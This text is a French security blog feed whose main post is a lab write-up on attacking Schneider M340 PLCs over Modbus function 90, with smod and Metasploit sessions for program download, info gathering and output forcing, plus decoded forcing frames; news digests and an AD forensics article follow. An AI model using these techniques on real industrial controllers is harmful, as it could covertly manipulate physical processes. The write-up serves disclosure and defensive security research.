Le protocole Modbus est un standard de communication utilisé dans les SI industriels. Développé dans les années 70 sur liaison série RS-485, il est désormais très répandu dans sa version TCP utilisable sur une liaison Ethernet classique.
Le protocole Modbus défini un certain nombre de fonctions, qui servent majoritairement à lire/écrire des données sur un automate programmable industriel.

root@kali:mbtget-master# ./mbtget -r3 -a 0 -n 8 192.168.0.110
values:
  1 (ad 00000):     1
  2 (ad 00001):     0
  3 (ad 00002):     0
  4 (ad 00003):     1
  5 (ad 00004):     0
  6 (ad 00005):     0
  7 (ad 00006):     0
  8 (ad 00007):     0
Lecture de données Modbus avec le programme « mbtget »

D’autres fonctions Modbus existent, comme l’indique ce tableau provenant du standard officiel : 

Spécifications du protocole Modbus (http://www.modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf)

Il est possible d’identifier la liste des fonctions Modbus supportées par un automate, par exemple avec l’outil smod:

root@kali:~/smod# python smod.py 
< SMOD >
 ------- 
        \   ^__^
         \  (xx)\_______
            (__)\       )\/\
             U  ||----w |
                ||     ||
          --=[MODBUS Penetration Test FrameWork
       --+--=[Version : 1.0.4
       --+--=[Modules : 23
       --+--=[Coder   : Farzin Enddo
          --=[github  : www.github.com/enddo

SMOD > use modbus/scanner/getfunc
SMOD modbus(getfunc) > show options
 Name     Current Setting  Required  Description                                 
 ----     ---------------  --------  -----------                                 
 Output   True             False     The stdout save in output directory         
 RHOSTS                    True      The target address range or CIDR identifier 
 RPORT    502              False     The port number for modbus protocol         
 Threads  1                False     The number of concurrent threads            
 UID      None             True      Modbus Slave UID.                           
SMOD modbus(getfunc) > set RHOSTS 192.168.0.110
SMOD modbus(getfunc) > set UID 1
SMOD modbus(getfunc) > exploit
[+] Module Get Function Start
[+] Looking for supported function codes on 192.168.0.110
[+] Function Code 1(Read Coils) is supported.
[+] Function Code 2(Read Discrete Inputs) is supported.
[+] Function Code 3(Read Multiple Holding Registers) is supported.
[+] Function Code 4(Read Input Registers) is supported.
[+] Function Code 5(Write Single Coil) is supported.
[+] Function Code 6(Write Single Holding Register) is supported.
[+] Function Code 8(Diagnostic) is supported.
[+] Function Code 15(Write Multiple Coils) is supported.
[+] Function Code 16(Write Multiple Holding Registers) is supported.
[+] Function Code 22(Mask Write Register) is supported.
[+] Function Code 23(Read/Write Multiple Registers) is supported.
[+] Function Code 43(Read Device Identification) is supported.
[+] Function Code 90 is supported.

On peut ainsi utiliser les fonctions de diagnostique pour identifier précisément l’automate, en l’occurrence un Schneider M340 :


La fonction Modbus 0x5a

Historique

L’utilisation du protocole Modbus pour la programmation des automates Schneider a été révélée publiquement grâce aux travaux du projet Basecamp lors de la célèbre conférence S4, dédiée à la sécurité des SI industriels : http://www.digitalbond.com/blog/2012/01/19/project-basecamp-at-s4/
Vous pouvez retrouver les vulnérabilités identifiées sur les systèmes Schneider (et bien d’autres) dans la présentation de Reid Wightman : https://youtu.be/dtadMIN3CCc?t=35m29s
Nous avions déjà évoqué cette fonctionnalité dans notre article dédié au pentest d’automates dans le magazine MISC 74 . Il suffit d’observer les trames réseau échangées entre Unity Pro et l’automate lors de sa programmation pour identifier que c’est le protocole Modbus qui est utilisé, via une fonction non-documentée (90) :

Capture réseau des échanges entre le logiciel de programmation et un automate Schneider

Comme les autres fonctions Modbus, il n’existe aucun mécanisme de sécurité pour ce protocole de programmation : il suffit d’avoir un accès réseau sur le port TCP 502 d’un automate pour pouvoir réaliser des actions d’administration.


Récupération du programme automate

La récupération du programme de l’automate n’était, en tout cas dans nos tests, pas totalement fonctionnelle dans le module publié lors du projet Basecamp. Nous avions pu le modifier légèrement afin de prendre en compte des programmes de taille plus importante. Nous avons simplement eu à modifier un compteur pour la rendre fonctionnelle. Détaillons son utilisation.

  • Création d’une archive programme vide : Dans le logiciel Unity Pro, ouvrons un programme existant et enregistrons-le en tant qu’archive (« .sta »)
  • Récupérons le programme de l’automate
msf auxiliary(modicon_stux_transfer_ASO) > set ACTION DOWNLOAD
ACTION => DOWNLOAD
msf auxiliary(modicon_stux_transfer_ASO) > run

[*] 192.168.0.110:502 - MODBUS - Sending read request
[*] 192.168.0.110:502 - MODBUS - Retrieving file
[*] 192.168.0.110:502 - MODBUS - Closing file  '/opt/metasploit/apps/pro/msf3/data
/exploits/modicon_ladder.apx'
[*] Auxiliary module execution completed
msf auxiliary(modicon_stux_transfer_ASO) >

  • Insérons le fichier « .apx » dans l’archive
root@kali:~# file demo_archive.sta 
demo_archive.sta: Zip archive data, at least v1.0 to extract
root@kali:~# unzip demo_archive.sta
Archive:  demo_archive.sta
   creating: BinAppli/
  inflating: BinAppli/Station.apd    
  inflating: BinAppli/Station.apx    
  inflating: STATION.CTX             
 extracting: TA.xma                  
   creating: ThirdParty/
root@kali:~/unity# cp /opt/metasploit/apps/pro/msf3/data/exploits/modicon_ladder.apx 
BinAppli/Station.apx
root@kali:~/unity# ls
BinAppli  demo_archive.sta  STATION.CTX  TA.xma  ThirdParty
root@kali:~/unity# rm BinAppli/Station.apd
root@kali:~/unity# zip demo_archive2.sta -r BinAppli/ STATION.CTX  TA.xma  ThirdParty/
  adding: BinAppli/ (stored 0%)
  adding: BinAppli/Station.apx (deflated 61%)
  adding: BinAppli/Station.apd (deflated 19%)
  adding: STATION.CTX (deflated 58%)
  adding: TA.xma (stored 0%)
  adding: ThirdParty/ (stored 0%)
root@kali:~/unity#

  • Ouvrons le fichier dans Unity : il suffit ensuite d’ouvrir le fichier avec Unity pro pour accéder au programme : 
Affichage du code « ladder » dans Unity Pro

La vidéo ci-dessous montre l’utilisation du module pour télécharger le programme et vérifier qu’il s’agit du même que celui issu de Unity Pro : https://www.youtube.com/watch?v=xRbulEX3_3o

La démarche inverse, reprogrammer l’automate, est également possible en théorie. En revanche, nous n’avons pas réussi à le rendre fonctionnel. Lors de l’upload d’un nouveau programme, nous obtenons ensuite cette erreur : 


L’automate a bien été reprogrammé, mais il ne reconnaît pas le programme transmis et considère donc qu’il n’est pas programmé. Cette attaque permet donc plutôt un déni de service.

Récupération des informations du programme

L’analyse des trames échangées lors de l’initialisation de la connexion entre le logiciel de programmation légitime (Unity Pro) et l’automate permet d’identifier qu’un certain nombre d’informations sont envoyées par l’automate.

Capture réseau entre Unity Pro et un automate Schneider M340

Nous avons donc modifié le module Metasploit précédent afin de permettre la récupération de ces informations : 

msf > use auxiliary/admin/scada/modicon_stux_transfer_ASO 
msf auxiliary(modicon_stux_transfer_ASO) > show actions

Auxiliary actions:

   Name          Description
   ----          -----------
   DOWNLOAD      Download the ladder logic from the PLC
   GATHER_INFOS  Get informations about the PLC configuration
   UPLOAD        Upload a ladder logic file to the PLC


msf auxiliary(modicon_stux_transfer_ASO) > set ACTION GATHER_INFOS 
ACTION => GATHER_INFOS
msf auxiliary(modicon_stux_transfer_ASO) > show options

Module options (auxiliary/admin/scada/modicon_stux_transfer_ASO):

   Name      Current Setting                     Required  Description
   ----      ---------------                     --------  -----------
   FILENAME  [...]/modicon_ladder.apx            yes       The file to send or receive
   RHOST                                         yes       The target address
   RPORT     502                                 yes       The target port


Auxiliary action:

   Name          Description
   ----          -----------
   GATHER_INFOS  Get informations about the PLC configuration


msf auxiliary(modicon_stux_transfer_ASO) > set RHOST 192.168.0.110
RHOST => 192.168.0.110
msf auxiliary(modicon_stux_transfer_ASO) > run

[*] Sending initialization requests ...
[+] PLC model : BMX P34 2030
[+] Project name : Test - Project ABC 123 Yolo
[+] Project comments : this is where the comments are put. YOLO @@@ !!!
[+] Unity Pro software version : V5.0
[*] Auxiliary module execution completed
Récupération d’information via le module Metasploit

Ces informations concordent avec celles obtenues graphiquement dans le logiciel légitime :

Informations sur le projet dans Unity pro

Forçage de valeurs

Le logiciel Unity Pro embarque également des fonctionnalités de simulation et de « forçage » des valeurs de l’automate. En effet, lors de l’installation d’un nouveau procédé industriel, il peut s’avérer pratique de « fausser » la valeur d’une variable pour simuler une action ou une situation spécifique. L’équivalent dans le monde informatique serait de « coder en dur » la valeur d’une variable.
Cette opération se réalise dans Unity Pro par la création d’une « table d’animation » dans laquelle on va renseigner les variables à forcer : 

Forçage de valeurs à 1 dans Unity Pro

Via l’analyse des trames réseau échangées lors du forçage de valeurs, il a été possible de comprendre partiellement le protocole. Ci-dessous, on présente une comparaison des trames pour forcer la sortie %Q0.17à 1, et forcer la sortie %Q0.18à 0 : 

[…]\x04\x00\x00\x00\x01\x00\x01\x20\x02\x01\x00\x11\x00\x01\x00\x00\x00\x03
[…]\x04\x00\x00\x00\x01\x00\x01\x20\x02\x01\x00\x12\x00\x01\x00\x00\x00\x02

Un octet permet de déterminer la sortie à forcer : 
  • 0x11 pour la sortie %Q0.17
  • 0x12 pour la sortie %Q0.18
La valeur de forçage est déterminée par le dernier octet :
  • 0x03 pour 0
  • 0x02 pour 1
  • 0x04 pour annuler le forçage

Dans la vidéo ci-dessous, on démontre le fonctionnement du module Metasploit en alternant les valeurs de forçage des sorties 17 à 23 : https://www.youtube.com/watch?time_continue=2&v=D1p2ni0eGhc

Pourquoi cette fonction est-elle intéressante du point de vue d’un attaquant ?

Dans un SI industriel en fonctionnement, les opérateurs ne surveillent pas le procédé avec Unity pro, mais un logiciel de supervision de type SCADA ou DCS, qui va leur permettre d’avoir une vue d’ensemble du précédé et de pouvoir interagir avec les différents composants. Ce logiciel va donc interroger, à intervalle régulier, les automates pour afficher les valeurs correspondantes à l’opérateur.
Cependant, dans la majorité des cas, ces logiciels ne vont pas directement afficher la valeur des sorties des automates ; des variables intermédiaires ou calculées sont utilisées. Ainsi, un attaquant capable de forcer la valeur des sorties de l’automate va pouvoir influencer le procédé physique, sans pour autant que cela soit visible du point de vue de l’opérateur en train de superviser le procédé.
Une démonstration live a été faite lors de la DEFCON. On peut observer que la valeur du feu rouge sur le logiciel de supervision IGSS reste fixe, tandis qu’en manipulant directement les variables de sortie on peut influencer sur la couleur du feu physique : https://www.youtube.com/watch?v=A_B69Rifu1g

Le module Metasploit n'étant pas totalement finalisé, il n'a pas fait l'objet d'une pull request vers le dépôt officiel. Vous pouvez néanmoins le trouver ici : https://github.com/wavestone-cdt/ics-tools.

Conclusion et sécurisation

Ces travaux ont été principalement réalisés sur des automates Schneider Premium et M340. Ils sont partiellement portables sur les nouvelles générations (par exemple M221) avec quelques ajustements. En effet, une capture réseau lors de la programmation d’un automate M221 montrera que c’est bien la fonction Modbus 90 qui est utilisée pour la programmation, mais de manière légèrement différente. Elle peut également être utilisé pour la mise en mode START ou STOP, ainsi que pour le forçage des valeurs de sortie.

Qu’en est-il ailleurs ?

L’utilisation de protocoles de communication non-sécurisés pour la programmation et la maintenance des automates programmables industriels est encore une réalité en cette fin d’année 2017. L’exemple ici présenté ne vise pas à cibler la marque Schneider en particulier. La grande majorité des constructeurs d’automates utilisent des protocoles non authentifiés pour la programmation. On pourrait notamment citer le cas de la majorité des automates reposant sur la bibliothèque CodeSys, comme démontré (là aussi) par Reid Wightman : http://www.digitalbond.com/blog/2012/10/25/new-project-basecamp-tools-for-codesys-200-vendors-affected/.

Que faire ?

La sécurisation d’un SI industriel doit donc prendre en compte le fait qu’un accès réseau sur le port TCP 502 permet d’accéder à la logique de l’automate, de la modifier mais également de forcer certaines valeurs, ce qui permet à un attaquant de mener une attaque qui ne sera pas visible de l’opérateur.
Les dernières versions d’automates, notamment dans les gammes les plus chères, incluent désormais des fonctions de sécurisation. L’approche la plus fréquente est d’encapsuler les protocoles non-sécurisés dans un tunnel authentifié et chiffré, avec TLS (Siemens) ou IPSEC (Schneider). Il conviendra cependant d’évaluer le bon niveau de sécurité de ces nouvelles fonctionnalités.
Il faut donc commencer par appliquer les bonnes pratiques de cloisonnement réseau, et superviser les actions d’administration. On peut par exemple mettre en place une sonde de type IDS avec une signature dédiée à la fonction 90 de Modbus.
Enfin, un axe d’amélioration axé métier serait la mise en place de mécanismes de contrôle d’intégrité au niveau des automates et du SCADA, permettant de s’assurer que les variables utilisées reflètent la réalité du procédé physique. On pourrait ainsi imaginer l'insertion, dans la logique de l'automate, quelques fonctions visant à assurer la détection d'une incohérence entre une valeur intermédiaire et une valeur de sortie. De la même manière, il serait intéressant pour le logiciel SCADA de pouvoir notifier l'opérateur lorsque des valeurs sont forcées, mais cette capacité n'est, à notre connaissance, pas proposée par les automates étudiés.


Arnaud SOULLIE

CERT-W : Retours sur l'actualité de la semaine du 5 au 11 février 2018

February 16, 2018, 5:08 am
$
0
0

Comme chaque semaine, retrouvez notre revue d'actualité de la sphère cyber-sécurité. Cette compilation de brèves vous permettra d'alimenter les discussions des prochaines pauses cafés !
Retrouvez également le focus de la semaine par Nicolas DAUBRESSE sur l'utilisation des métadonnées de réplication au sein d'un AD.

Veille cybercriminalité

Auriez-vous remarqué ...

Ce skimmer ? L'un des passe-temps du chercheur en sécurité Brian Krebs est l'étude et le répertoriage des skimmers, modules physiques déposés sur un distributeur automatique et ayant pour but de voler des informations de l'utilisateur : numéro de carte bleue, code PIN, etc. Vous seriez-vous fait avoir ?

ICS Cryptojacking

Sous ce nom énigmatique se cache la première attaque de malware visant à miner des cryptomonnaies (cryptojacker) sur un système industriel (Industrial Control System, ou ICS). L'entreprise Radiflow aurait découvert un mineur de Monéro (XMR) installé sur l'interface homme-machine SCADA d'une société de traitement des eaux d'origine européenne.

Air France offre 2 billets gratuits

Avez-vous reçu cette annonce la semaine dernière ? Si oui, à l'instar de nombreux français, vous avez reçu une annonce de phishing dont l'objectif est de récupérer votre adresse e-mail, pour une utilisation dans le cadre de campagne de spam ou de revente de données personnelles. Il est à noter que le nom de domaine utilisé par l'attaquant est ici très proche du nom de domaine www.airfrance.com, à l'exception du second "a" remplacé par un équivalent vietnamien, souligné d'un point.

Minage de cryptocoins au travail

Des chercheurs d'un centre de recherche nucléraire russe ont été surpris dans leur utilisation du super-ordinateur qu'ils avaient à disposition pour miner des cryptocoins. L'ordinateur en question est capable de réaliser 1.000.000.000.000.000 d'opérations sur des nombres à virgule (float), totalisation donc 1.0 PetaFLOPs (contre une diazaine voire un centain de GoFLOPs pour un processeur standard).

Attaque olympique

Le site officiel des jeux olympiques d'hiver aurait subi une attaque qui a provoqué son indisponibilité, aux alentours de la cérémonie d'ouverture. Il peut donc s'agir d'une attaque de type déni de service, ou d'un arrêt du site pour prévenir une attaque en cours. Les sources officielles sont pour l'instant dans l'incapacité de mettre un nom sur l'origine de l'attaque.

In fraud we trust

Le gouvernement étatsunien a démantelé un réseau majeur de fraude bancaire d'origine ukrainienne, nommé "Infraud Organization". Le réseau serait à l'origine de 530 millions de dollars de pertes, utilisant des techniques variées telles que l'installation de malware sur les Point of Sales (POS) ou le recel de numéro de cartes bancaires.

Veille vulnérabilité

Intel étend son programme de bug bounty

Intel a récemment étendu le périmètre couvert par son programme de bug bounty, initialement lancé en mars 2017. Celui-ci inclut désormais les attaques par canaux auxilliaires (Spectre, Meltdown), et propose des primes alléchantes pour la découvertes de celles-ci (jusqu'à $250.000).

Google 2017 Vulnerability program review

Google passe en revue son programme de bug bounty sur l'année 2017 et met notamment en avant trois exploits particulièrement intéressants remontés l'année dernière.

Exploitation sur Cisco ASA

Cisco avait remonté fin janvier la présence d'une vulnérabilité critique (CVSS 10) sur ses appliances Cisco ASA. Il est désormais clair que cette vulnérabilité est massivement exploitée, et il devient donc nécessaire de mettre à jour les équipements impactés dans les plus cours délais.

Indicateurs de la semaine

L'exploit de la semaine - HPE iLO 4 < 2.53 - Add new admin

Un script exploitant la vulnérabilité CVE-2017-12542 (découvert en février 2017 par Synacktiv, et rendue publique par HP en août 2017) a été publié. Celui-ci permet l'ajout en remote d'un nouvel administrateur sur les cartes HPE iLO.

Le leak de la semaine - Swisscom

L'opérateur télécom suisse Swisscom a été victime en août 2017 d'une exfiltration de données client (nom, adresse, date de naissance, numéro de téléphone). 800.000 clients seraient touchés par cette fuite de données. L'opérateur Swisscom indique que la fuite provient d'un partenaire qui disposaient d'un accès à ces données pour prévenir les clients de la fin prochaine de leur contrat.

L'attaque de la semaine - Newtek live customer phishing

Newtek est une entreprise américain fournissant des services dans le domaine du web, dont la fourniture et la gestion de plus de 100.000 noms de domaine. Le 10 février 2018, les clients de Newtek ont reçu un email les encourageant à visiter le site de l'entreprise, suite à de nouvelles mesures de sécurité. Ledit site avait en réalité été compromis par un pirate Vietnamien, qui avait alors procéder à l'installation d'un chat web pour échanger avec les clients et leur extorquer des informations sensibles.

Suivi des versions

Produits
Version actuelle
Adobe Flash Player
28.0.0.161
Adobe Acrobat Reader DC
2018.011.20035
Java
Version 8 Update 161
Mozilla Firefox
58.0.2
Google Chrome
64.0.3282.167
VirtualBox
5.2.6
CCleaner
5.40.6411

Jean MARSAULT
Search

Utilisation des métadonnées de réplication, quand les journaux font défaut

February 16, 2018, 5:08 am
$
0
0

Introduction aux données de réplication de l’Active Directory

Au sein d’un domaine Active Directory se trouvent généralement plusieurs contrôleurs de domaine qui nécessitent de disposer des mêmes informations. Pour parvenir à cela, l’Active Directory dispose d’un mécanisme de réplication qui permet, entre autres, de propager un changement depuis un contrôleur de domaine vers les autres. 
Dans son processus de réplication, l’Active Directory utilise des USN (Update Sequence Number) pour déterminer l’état des contrôleurs de domaines. Ces USN représentent un compteur stocké dans la base de données de l’Active Directory, qui est incrémenté à chaque changement de cette base au niveau d’un contrôleur de domaine. Chaque contrôleur de domaine dispose alors d’un USN qui lui est propre.
Lorsqu’un changement d’une information de l’Active Directory intervient sur un contrôleur de domaine, deux cas peuvent se présenter :
  • L’information modifiée n’est pas une information répliquée entre les différents contrôleurs de domaines. C’est le cas de l’ensemble des attributs de l’Active Directory qui disposent du flag FLAG_ATTR_NOT_REPLICATED[1] comme par exemple l’attribut « BadPwdCount » qui tient compte du nombre de tentatives de connexion échouées :


    Dans ce cas, le contrôleur de domaine effectue la modification dans sa propre base de données, mais ne transmet rien aux autres contrôleurs de domaine.

  • L’information modifiée nécessite une réplication entre les différents contrôleurs de domaines. Dans ce cas, le contrôleur de domaine qui a reçu le changement utilise le modèle de réplication de l’Active Directory pour transmettre le changement aux autres contrôleurs du domaine. Ce modèle de réplication ne sera pas détaillé dans cet article, mais permet la diffusion des évolutions à l’ensemble des contrôleurs d’un domaine en limitant le trafic nécessaire et en assurant la gestion des collisions (en cas de changement d’un même attribut sur différents contrôleurs sur une fenêtre de temps réduite).
Le processus de réplication utilise des métadonnées qui sont conservées sous la forme de deux attributs distincts : msDS-ReplAttributeMetaData[2] et msDS-ReplValueMetaData[3]. msDS-ReplAttributeMetaData est utilisé pour les changements effectués sur les attributs non linkés de l’Active Directory alors que msDS-ReplValueMetaData est réservé aux attributs linkés.
Les attributs linkés ont été introduits dans l’Active Directory à partir du niveau fonctionnel Windows Server 2003. Ce sont en fait des paires d’attributs dont la valeur de l’un est basée sur celle de l’autre. C’est par exemple le cas des attributs member d’un groupe et memberof de l’utilisateur.

Quel intérêt pour l’investigation ?

En tant qu’analyste forensic qui intervient suite à un incident de sécurité, le premier réflexe pour permettre d’identifier les actions malveillantes ayant eu lieu au sein d’un Active Directory est l’utilisation des journaux d’événements. Mais que faire si ceux-ci n’étaient pas activés au moment de l’attaque ? Ou si l’attaquant est parvenu à supprimer les journaux générés par ses actions, comme le permet un outil comme mimikatz[4] ?
Dans de telles situations, il est possible d’utiliser les données de réplication pour obtenir une vision partielle des actions des attaquants. En effet, d’après le fonctionnement des données de réplication, toute modification d’un attribut de l’Active Directory aboutit à la création d’une donnée de réplication contenant différentes informations pouvant être utile pour une investigation. 
Dans le cas d’un attribut non linké, et donc d’une métadonnée de type msDS-ReplAttributeMetaData, les informations stockées sont la version, qui correspond au nombre de changements de l’attribut depuis sa création, la date à laquelle a été effectuée la modification, l’USN correspondant au changement pour le contrôleur de domaine qui a initié la réplication, l’USN correspondant au changement pour le contrôleur de domaine sur lequel est récupéré la métadonnée, ainsi que l’UUID et le DN du contrôleur de domaine ayant initié le changement :


Pour les attributs linkés, les métadonnées de réplication, cette fois de type msDS-ReplValueMetaData, vont également stocker des informations sur les attributs liés à l’attribut en question. Les métadonnées de réplication vont alors conserver des informations sur chacune des propriétés de l’attribut lié, y compris pour les valeurs précédentes. Dans l’exemple de l’attribut member, les données de réplication conserveront donc à la fois des informations sur les membres actuels du groupe, mais également sur les utilisateurs ayant été membres mais ne l’étant plus :


A un instant donné, il est alors possible grâce à ces données de déterminer la date de dernière modification d’un attribut, ainsi que le nombre de fois où il a été modifié depuis sa création. Ces données, bien que semblant très limitées, peuvent alors servir à identifier différents scénarios d’attaque.

Elévation de privilèges par ajout dans un groupe

L’un des cas où les données de réplication offrent les meilleurs résultats est l’identification d’un scénario où l’attaquant s’est ajouté, puis supprimé d’un groupe, comme par exemple le groupe « Admins du domaine ». 
En effet, au sein d’un Active Directory, les groupes possèdent une propriété « member » qui liste les utilisateurs appartenant au groupe. L’ajout d’un utilisateur dans un groupe va alors incrémenter l’USN de son attribut « member » de 1, celui-ci ayant été modifié. De même, le retrait de l’utilisateur incrémentera également cet USN de 1. 
Etant donné ces propriétés, deux conclusions sont possibles :

  • Les utilisateurs ayant un USN impair sont membres du groupe (chose qu’il est directement possible de voir dans la valeur de l’attribut « member »), et la date de dernier ajout de l’utilisateur au sein du groupe est celle de l’USN ;
  • Les utilisateurs ayant un USN pair ont appartenu au groupe, mais n’en font plus parti depuis la date de l’USN. 
C’est donc dans le second cas que se retrouverait le compte d’un attaquant s’étant ajouté au groupe « Admins de domaine » pour réaliser des actions malveillantes, puis supprimé du groupe. Il est alors possible de créer un script récupérant les utilisateurs ayant été ajoutés ou supprimés d’un groupe après une date donnée (seule la date de premier et de dernier changement étant conservés, il ne serait pas fiable de limiter la recherche à une date maximale) :



Targeted Kerberoasting

Le kerberoasting est une technique qui exploite le processus d’authentification Kerberos pour permettre à un attaquant de récupérer le mot de passe d’un compte de service (comprendre « compte disposant d’un Service Principal Name »). Le principe de cette attaque est que, comme le montre le schéma suivant, lors d’une demande d’authentification à un service par un utilisateur, le KDC utilise le hash NTLM du compte de service pour chiffrer le TGS renvoyé à l’utilisateur. Dans ce processus, la légitimité de l’utilisateur à accéder au service n’est pas vérifiée, et n’importe quel utilisateur peut donc obtenir le TGS.



Il est alors possible pour l’attaquant d’effectuer une tentative de cassage du hash NTLM du compte de service en tentant de déchiffrer le TGS à partir de hashs successifs.
Supposons maintenant qu’un attaquant soit parvenu à récupérer des privilèges maximums sur un objet utilisateur, à savoir des privilèges de type GenericAll[5], qui donne notamment le droit de modifier le mot de passe du compte, ou encore de modifier les propriétés de l’objet Active Directory associé au compte. Pour usurper l’identité du compte en question, l’attaquant pourrait donc réinitialiser le mot de passe du compte avec une valeur qu’il choisit, et se connecter à l’aide de ce nouveau mot de passe. Néanmoins, une telle attaque serait rapidement détectée par l’utilisateur légitime du compte, qui ne parviendrait plus à se connecter avec son mot de passe habituel.
Une possibilité plus intéressante pour l’attaquant serait alors d’ajouter un Service Principal Name (SPN) au compte de ciblé, puis d’exécuter une attaque de type kerberoasting. C’est ce qu’on appelle le targeted kerberoasting.
La majorité des utilisateurs d’un domaine n’étant jamais supposée avoir de SPN, une telle attaque peut assez simplement être détectée si ce SPN n’est pas supprimé. Si par contre ce SPN est supprimé par l’attaquant une fois l’attaque effectuée, il reste toujours possible d’utiliser les données de réplication ! 
En effet, l’ajout ou la suppression d’un SPN sont des événements répliqués au sein de l’Active Directory, et génèrent donc des métadonnées de réplication de type msDS-ReplAttributeMetaData :


Il est alors possible de créer un script récupérant les comptes du domaine dont l’attribut SPN a été modifié depuis une date donnée, comptes qui sont donc des victimes potentielles d’une attaque de type targeted kerberoasting. 

Bruteforce d’un compte par blocage successif

Un scénario d’attaque par bruteforce pouvant être utilisé par un attaquant au sein d’un Active Directory ne disposant d’aucune alerte est la réalisation de tentatives de connexion en dehors des heures d’utilisation du compte, et ce jusqu’au blocage du compte.
Lors du blocage d’un compte, un flag LOCKOUT[6] est positionné sur l’attribut userAccountControl d’un utilisateur. Cet attribué étant répliqué entre les différents contrôleurs de domaine, des données de réplication de type msDS-ReplAttributeMetaData sont alors générées. Il est alors possible de créer un script permettant d’identifier les comptes du domaine ayant un numéro de version important dans les données de réplication de cet attribut, ce qui pourrait annoncer un tel bruteforce :


Il est cependant à noter que l’attribut userAccountControl dispose de plusieurs autres flags dont la modification entrainerait également la génération de données de réplication, indissociable des précédentes, comme par exemple pour le flag PASSWORD_EXPIRED. Cependant, cet attribut n’est généralement pas amené à évoluer grandement, et un très grand nombre de changements reste un indicateur relativement fiable d’un bruteforce.
Un autre point à noter est qu’en limitant les tentatives de connexion pour éviter le blocage du compte, un attaquant serait invisible à cette méthode d’investigation. 


Conclusion

Bien que n’apportant pas une vision aussi complète que les journaux d’événements, les données de réplication peuvent donc être une source d’information non négligeable pour une investigation forensic dans un Active Directory. 
Il est cependant à noter que des techniques permettant la modification des données de réplication pourraient exister[7], la confiance accordée aux informations obtenues grâce à celles-ci ne doit donc pas être aveugle.


Nicolas DAUBRESSE

Sources :


CERT-W : Retours sur l'actualité de la semaine du 12 au 18 février 2018

February 23, 2018, 1:53 am
$
0
0

Comme chaque semaine, retrouvez notre revue d'actualité de la sphère cyber-sécurité. Cette compilation de brèves vous permettra d'alimenter les discussions des prochaines pauses cafés !
Retrouvez également le focus de la semaine par Florian DESMONS sur la vulnérabilité KRACK.

Veille cybercriminalité

Des cybercriminels utilisent Google Adwords pour dérober des millions de dollars en Bitcoin

Un groupe de cybercriminels basé en Ukraine a utilisé Google Adword pour faire référencer des sites malveillants liés au Bitcoin. Pour cela, les recherches contenant les mots clés "blockchain" ou encore "bitcoin wallet" retournaient des sites contenant du phishing dans le but de récupérer les porte-monnaies électroniques (wallet). Au travers de cette campagne, nommée Coinhoarder, le groupe aurait dérobé l'équivalent de millions de dollars en Bitcoin (valeur sujette à évolution pendant la rédaction de cette article !).

Des récompenses de plus en plus élevées

Google indique sur son blog qu'il a versé 2.9 millions de dollars en 2017 dans le cadre de son programme de Bug Bounty, valeur qui est inférieure à celle de 2016. L'entreprise américaine annonce aussi sur son blog qu'elle va rehausser les primes sur certaines technologies.
Zerodium, une entreprise spécialisée dans la collecte de vulnérabiltiés, a aussi indiqué qu'elle augmentait les primes pour les vulnérabiltiés d'élévation de privilèges locale sur le socle Linux.

Exploitation active de la vulnérabilité touchant les produits Cisco ASA

Cedric Halbronn a présenté un PoC permettant d'exploiter une vulnérabilité critique (CVE-2018-0101) les composants Cisco Adaptive Security Appliance (ASA) qui permet d'obtenir un contrôle complet du système. Depuis, cette vulnérabilité est activement exploitée dans le but de causer des dénis de service sur les équipements réseaux. La base de code utilisée pourrait par la suite être utilisée pour prendre le contrôle de ces mêmes équipements. Il est donc recommander de mettre à jour au plus vite les équipements.

Des scientifiques arrêtés pour avoir miné de la cryptomonnaie dans un centre nucléaire

Des chercheurs du centre nucléaire Russe où première bombe atomique Russe a été créée, ont été arrêtés pour avoir miner de la cryptomonnaie sur les supercalculateurs (d'une puissance de 1-petaflop) du centre. Ils ont été identifiés lorsque les machines de simulation de tests nucléaires ont tenté de se connecter à Internet.

Veille vulnerabilite

Un caractère indien fait planter les applications Apple

Sur certaines versions des systèmes d'Apple (Mac, iPhone et iWatch), le caractère indien "Telegu" fait planter les applications (iMessage, WhatsApp, ...). Cela peut aussi faire planter le système si une notification contenant le caractère est affichée. Apple a publié un patch correctif sur ses appareils afin de corriger le bug.

Une vulnérabilité critique découverte dans l'application Télégram

La société russe Kaspersky a découvert une vulnérabilité dans l'application de messagerie Telegram reposant sur l'utilisation du caractère unicode de superposition de langages ("right to left override"). Ce caractère permet d'adapter l'affichage d'un texte pour les langues lisant de gauche à droite ou de droite à gauche.
Un attaquant peut tromper sa victime en inversant une partie du nom d'un programme malveillant affichant ainsi le nom d'un programme légitime. Par exemple, "photo_high_resgnp.js" devient "photo_high_ressj.png"

Microsoft corrige dans le Patch Tuesday de février une cinquantaine de vulnérabilités dont quatorze jugées critiques

Microsot a publié mardi 13 février une pléthore de patchs de sécurité sur une cinquantaine de vulnérabiltiés impactant les produits Windows, IE/Edge, Office et le lecteur Flash. Parmi les plus critiques deux vulnérabiltiés, CVE-2018-0850 et CVE-2018-0852, sur la messagerie Outlook permettent, respectivement, une élévation de privilèges et une exécution de code à distance lors de la lecture d'un mail.

Indicateurs de la semaine

Le leak de la semaine - Les données de clients de Western Union compromises

Western-Union a envoyé à certains de ses clients une lettre indiquant que la sauvegarde d'une base de données hébergée chez un tiers a été compromise. L'entreprise a indiqué qu'ils n'ont constaté aucune utilisation des données volée pour le moment et qu'ils ont contacté la police afin de mener des investigations.

L'exploit de la semaine - Une vulnérabilité de LibreOffice permet de lire les fichiers de la machine

Une vulnérabiltié de la suite bureautique LibreOffice permet de lire des fichiers à distance. Le logiciel est compatible avec des fonctions de la suite Microsoft Office et notamment "COM.MICROSOFT.WEBSERVICE". Sur les produits de Microsoft, cette fonction permet de lire uniquement des fichiers distants, il n'est donc pas possible de lire les fichiers locaux ("file://"). En revanche, sur les versions antérieures à 5.4.5 et 6.0.1 de LibreOffice, cette restriction n'est pas implémentée, permettant donc à une feuille de calculs de lire des fichiers du poste. Des détails sur l'exploitation de cette vulnérabiltié sont disponibles sur le Github pointé en annexe.

L'attaque de la semaine - Exécution de commande sous KDE Plasma en branchant une clef USB

Un bulletin de sécurité publié par KDE indique que lorsque que l'on insère une clef USB avec comme nom les caractères d'exécution de commandes "inline" ("``" ou "$()") alors, celle-ci est exécutée ! Cette vulnérabiltié, CVE-2018-6791, est jugée comme critique et est corrigée dans la dernière version de KDE (5.12.0).

Suivi des versions

Produits
Version actuelle
Adobe Flash Player
28.0.0.161
Adobe Acrobat Reader DC
2018.011.20035
Java
Version 8 Update 161
Mozilla Firefox
58.0.2
Google Chrome
64.0.3282.186
VirtualBox
5.2.6
CCleaner
5.40.6411

